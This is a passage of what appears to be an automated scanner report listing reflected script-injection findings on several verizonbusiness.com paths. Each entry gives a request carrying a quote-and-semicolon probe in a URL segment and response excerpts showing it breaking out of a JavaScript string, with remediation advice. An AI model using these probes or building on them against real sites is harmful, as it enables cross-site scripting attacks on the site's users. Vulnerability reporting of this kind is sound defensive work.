Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about69114'%3b5d23fde5181/news/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:23 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about69114';5d23fde5181/news/podcasts/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.377. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c853'%3bca22c29151d was submitted in the REST URL parameter 2. This input was echoed as 6c853';ca22c29151d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news6c853'%3bca22c29151d/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47099
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news6c853';ca22c29151d/podcasts/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.378. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82892"%3b3b168ef6b79 was submitted in the REST URL parameter 2. This input was echoed as 82892";3b168ef6b79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news82892"%3b3b168ef6b79/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:45 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47099
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news82892";3b168ef6b79/podcasts/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.379. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa2"%3b86cfc1c3fc0 was submitted in the REST URL parameter 3. This input was echoed as a5aa2";86cfc1c3fc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/podcastsa5aa2"%3b86cfc1c3fc0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:22 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49747
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/podcastsa5aa2";86cfc1c3fc0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.380. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb44'%3b19771e789d was submitted in the REST URL parameter 3. This input was echoed as 4eb44';19771e789d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/podcasts4eb44'%3b19771e789d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:54 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/podcasts4eb44';19771e789d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.381. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a47"%3b9a99c654d35 was submitted in the REST URL parameter 1. This input was echoed as 92a47";9a99c654d35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about92a47"%3b9a99c654d35/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:36 GMT
Content-Type: text/html
Content-Length: 40788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about92a47";9a99c654d35/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE
...[SNIP]...

1.382. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e002a'%3be3779b534a1 was submitted in the REST URL parameter 1. This input was echoed as e002a';e3779b534a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboute002a'%3be3779b534a1/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboute002a';e3779b534a1/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.len
...[SNIP]...

1.383. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132b5'%3b72fa7706189 was submitted in the REST URL parameter 2. This input was echoed as 132b5';72fa7706189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news132b5'%3b72fa7706189/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47247
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news132b5';72fa7706189/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.384. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cced8"%3b38d7f9e0386 was submitted in the REST URL parameter 2. This input was echoed as cced8";38d7f9e0386 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newscced8"%3b38d7f9e0386/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47247
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newscced8";38d7f9e0386/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIA
...[SNIP]...

1.385. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7418'%3ba7b518847bf was submitted in the REST URL parameter 3. This input was echoed as c7418';a7b518847bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c7418'%3ba7b518847bf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c7418';a7b518847bf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.386. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84d7"%3b7df8aeca3f4 was submitted in the REST URL parameter 3. This input was echoed as a84d7";7df8aeca3f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/a84d7"%3b7df8aeca3f4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:56 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/a84d7";7df8aeca3f4";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.387. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e016"%3b029185a9346 was submitted in the REST URL parameter 1. This input was echoed as 9e016";029185a9346 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about9e016"%3b029185a9346/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:55 GMT
Content-Type: text/html
Content-Length: 40854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about9e016";029185a9346/news/pr-25634-en-Verizon Business Earns Telemark.s `World Class. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT C
...[SNIP]...

1.388. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab8db'%3b0339a38bc2d was submitted in the REST URL parameter 1. This input was echoed as ab8db';0339a38bc2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

